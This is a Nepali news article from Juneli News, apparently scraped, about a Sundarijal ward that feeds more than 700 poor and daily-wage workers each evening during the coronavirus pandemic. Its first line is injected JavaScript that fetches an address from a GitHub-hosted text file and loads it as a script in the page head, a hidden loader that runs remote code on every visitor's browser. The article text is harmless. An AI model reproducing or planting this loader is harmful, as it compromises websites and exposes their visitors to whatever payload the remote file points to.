;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); सुन्दरीजलमा दैनिक ७०० बढीलाई खाना खुवाउदै – जुनेली न्युज
मङ्लबार, असार ११, २०८२
  • होमपेज
  • सुन्दरीजलमा दैनिक ७०० बढीलाई खाना खुवाउदै
जुनेली बिशेष

सुन्दरीजलमा दैनिक ७०० बढीलाई खाना खुवाउदै

बैशाख २४,

काठमाडौँ |  गोकर्नेश्वोर नगरपालिका वडा नं १ सुन्दरीजलमा दैनिक ७ सय भन्दा बढीलाई खाना खुवाउदै आइ रहेको छ |वडाका अध्यक्ष राम मानन्धरको नेतृत्वमा २०७७ बैशाख  ५ गते देखि दैनिक बेलुका श्री राम जानकी आधारभूत बिधालयमा  खाना खुवाइएको हो |

कोरोना भाइरसको महामारीले गर्दा दैनिक मजदुरी गर्ने बिपन्न बर्गलाई लक्षित गरेर खाना खुवाइएको हो |खानाको लागि मजदुर तथा बिपन्न बर्गहरु घरबाटै भाडा लिएर आउछन र आफुलाई चाहे जति परिवारलाई पुग्नी खाना लगेर जाने व्यबस्था भएको वडा अध्यक्षले बताए | तेस्तै गोकर्नेश्वोर नगरपालिका भरिमै जोरपाटी बराल पुम्प  पछि  खाना खुवाउन सुरु गरेको  उनले बताए | सामाजिक दुरी पनि कायम गरिएको र खाना लिन आउनेलाई हात धुन लगाइने र फिल्टर गरेको पानि खुवाइने गरि  ब्यबस्थित तरिकाले खाना खुवाइएको उनको भनाइ छ |

खाना खुवाउने कार्यक्रममा सहयोग गर्नु हुने सम्पूर्ण सहयोगी हात हरुलाई यसै जुनेली न्युज मार्फत धन्यबाद पनि दिएका छन |

 

फेसबुक प्रतिक्रियाहरु